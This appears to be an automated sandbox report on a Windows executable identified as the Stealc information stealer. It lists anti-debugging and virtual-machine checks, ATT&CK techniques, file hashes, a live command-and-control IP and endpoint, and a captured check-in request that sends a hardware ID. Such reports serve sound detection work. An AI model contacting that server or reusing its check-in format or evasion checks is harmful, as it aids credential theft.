                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0026ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00274570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00274570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0026DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0026BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00273EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00273EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0026F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00261160 GetSystemInfo,ExitProcess,0_2_00261160
                Source: file.exe, file.exe, 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
                Source: file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware]
                Source: file.exe, 00000000.00000002.1800007747.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800007747.0000000000E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13481
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13484
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13535
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13495
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13503
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002645C0 VirtualProtect ?,00000004,00000100,000000000_2_002645C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00279860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00279860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00279750 mov eax, dword ptr fs:[00000030h]0_2_00279750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00277850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00277850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6960, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00279600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00279600
                Source: file.exe, file.exe, 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: [Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00277B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00276920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00276920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00277850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00277850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00277A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00277A30

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.260000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1758315822.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6960, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.260000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1758315822.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6960, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (one line per tactic; the number before a technique is the signature count shown in the report, techniques without a number were not observed):

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37 | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                http://185.215.113.37/ws | 100% | URL Reputation | malware |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/n | file.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37D~f | file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php3S | file.exe, 00000000.00000002.1800007747.0000000000E8C000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1532351
                      Start date and time:2024-10-13 01:28:08 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 7s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:1
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 87
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • VT rate limit hit for: file.exe
                      No simulations
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      No context
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      No context
                      No context
                      No created / dropped files found
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.946680839484712
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'801'216 bytes
                      MD5:cfdd8a903441555e23417125bccc4e60
                      SHA1:5ee09d72d09a587d1399d651d5e2d3e199899ae3
                      SHA256:51104c217fb4ac57c1ef1071eaf80c801e17a2ca4c1b83a31d2d7a43b5f22671
                      SHA512:2f05454ec5fdccc149959a39fba755223998a6c23828cef3fb893f70ceaed253d6ebee511356aeb315a73d77e839aef3bddde0e4fe6736be952adedd945aa853
                      SSDEEP:24576:lKs9OT6FhNwzGxqIhUcoevXJ7/bJDq74o83qbwY+l7CicoU4k3UxICaS6:lbY6PCjzc5h9mE9aZ+leiVLmUxICaS
                      TLSH:DE853319DE219AD9FD9DDB7599DD939C320C390938F8C06F3AC902F119EF30998225A7
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0xa82000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      (unnamed) | 0x1000 | 0x25b000 | 0x22800 | 80b4183b68f42c59f2ee0f1ffc50b7f3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      (unnamed) | 0x25e000 | 0x291000 | 0x200 | df03a257ee8afef203b30ed611ae9d3e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      nlvthzrj | 0x4ef000 | 0x192000 | 0x191800 | e9269cdb41391233bf5ce6e9b4baf296 | False | 0.9947395752257161 | data | 7.953408451979988 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      juspdwth | 0x681000 | 0x1000 | 0x600 | 92062a77191b8171b21c876cd99f37be | False | 0.5436197916666666 | data | 4.784590729125928 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant | 0x682000 | 0x3000 | 0x2200 | 98f548e7f9a51b76a41735ca0d0b59d5 | False | 0.09834558823529412 | DOS executable (COM) | 1.0625158259389011 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      DLL | Import
                      kernel32.dll | lstrcpy
                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                      2024-10-13T01:29:11.939162+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49732 | 185.215.113.37 | 80 | TCP
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Oct 13, 2024 01:29:10.980038881 CEST | 49732 | 80 | 192.168.2.4 | 185.215.113.37
                      Oct 13, 2024 01:29:10.985424042 CEST | 80 | 49732 | 185.215.113.37 | 192.168.2.4
                      Oct 13, 2024 01:29:10.985546112 CEST | 49732 | 80 | 192.168.2.4 | 185.215.113.37
                      Oct 13, 2024 01:29:10.985694885 CEST | 49732 | 80 | 192.168.2.4 | 185.215.113.37
                      Oct 13, 2024 01:29:10.990712881 CEST | 80 | 49732 | 185.215.113.37 | 192.168.2.4
                      Oct 13, 2024 01:29:11.702768087 CEST | 80 | 49732 | 185.215.113.37 | 192.168.2.4
                      Oct 13, 2024 01:29:11.702853918 CEST | 49732 | 80 | 192.168.2.4 | 185.215.113.37
                      Oct 13, 2024 01:29:11.705825090 CEST | 49732 | 80 | 192.168.2.4 | 185.215.113.37
                      Oct 13, 2024 01:29:11.710669041 CEST | 80 | 49732 | 185.215.113.37 | 192.168.2.4
                      Oct 13, 2024 01:29:11.938935041 CEST | 80 | 49732 | 185.215.113.37 | 192.168.2.4
                      Oct 13, 2024 01:29:11.939162016 CEST | 49732 | 80 | 192.168.2.4 | 185.215.113.37
                      Oct 13, 2024 01:29:14.923192024 CEST | 49732 | 80 | 192.168.2.4 | 185.215.113.37
                      • 185.215.113.37
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49732 | 185.215.113.37 | 80 | 6960 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Oct 13, 2024 01:29:10.985694885 CEST | 89 | OUT | GET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Oct 13, 2024 01:29:11.702768087 CEST | 203 | IN | HTTP/1.1 200 OK
                      Date: Sat, 12 Oct 2024 23:29:11 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Oct 13, 2024 01:29:11.705825090 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBF
                      Host: 185.215.113.37
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 38 42 35 32 41 45 41 36 30 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 2d 2d 0d 0a
                      Data Ascii: ------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="hwid"D8B52AEA60BD3120641781------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="build"doma------DBKFIDAAEHIEGCBFIDBF--
                      Oct 13, 2024 01:29:11.938935041 CEST | 210 | IN | HTTP/1.1 200 OK
                      Date: Sat, 12 Oct 2024 23:29:11 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=
                      Target ID:0
                      Start time:19:29:07
                      Start date:12/10/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x260000
                      File size:1'801'216 bytes
                      MD5 hash:CFDD8A903441555E23417125BCCC4E60
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1758315822.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                        Execution Graph

                        Execution Coverage:8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:9.7%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:24
13777->13778 13779 27a8a0 lstrcpy 13778->13779 13780 276455 13779->13780 13781 27a8a0 lstrcpy 13780->13781 13782 276467 13781->13782 13783 27a8a0 lstrcpy 13782->13783 13784 275b86 13783->13784 13784->13548 13786 2645c0 2 API calls 13785->13786 13787 2626b4 13786->13787 13788 2645c0 2 API calls 13787->13788 13789 2626d7 13788->13789 13790 2645c0 2 API calls 13789->13790 13791 2626f0 13790->13791 13792 2645c0 2 API calls 13791->13792 13793 262709 13792->13793 13794 2645c0 2 API calls 13793->13794 13795 262736 13794->13795 13796 2645c0 2 API calls 13795->13796 13797 26274f 13796->13797 13798 2645c0 2 API calls 13797->13798 13799 262768 13798->13799 13800 2645c0 2 API calls 13799->13800 13801 262795 13800->13801 13802 2645c0 2 API calls 13801->13802 13803 2627ae 13802->13803 13804 2645c0 2 API calls 13803->13804 13805 2627c7 13804->13805 13806 2645c0 2 API calls 13805->13806 13807 2627e0 13806->13807 13808 2645c0 2 API calls 13807->13808 13809 2627f9 13808->13809 13810 2645c0 2 API calls 13809->13810 13811 262812 13810->13811 13812 2645c0 2 API calls 13811->13812 13813 26282b 13812->13813 13814 2645c0 2 API calls 13813->13814 13815 262844 13814->13815 13816 2645c0 2 API calls 13815->13816 13817 26285d 13816->13817 13818 2645c0 2 API calls 13817->13818 13819 262876 13818->13819 13820 2645c0 2 API calls 13819->13820 13821 26288f 13820->13821 13822 2645c0 2 API calls 13821->13822 13823 2628a8 13822->13823 13824 2645c0 2 API calls 13823->13824 13825 2628c1 13824->13825 13826 2645c0 2 API calls 13825->13826 13827 2628da 13826->13827 13828 2645c0 2 API calls 13827->13828 13829 2628f3 13828->13829 13830 2645c0 2 API calls 13829->13830 13831 26290c 13830->13831 13832 2645c0 2 API calls 13831->13832 13833 262925 13832->13833 13834 2645c0 2 API calls 13833->13834 13835 26293e 13834->13835 13836 2645c0 2 API calls 13835->13836 13837 262957 13836->13837 13838 2645c0 2 API calls 13837->13838 13839 262970 13838->13839 13840 2645c0 2 API calls 13839->13840 13841 262989 13840->13841 
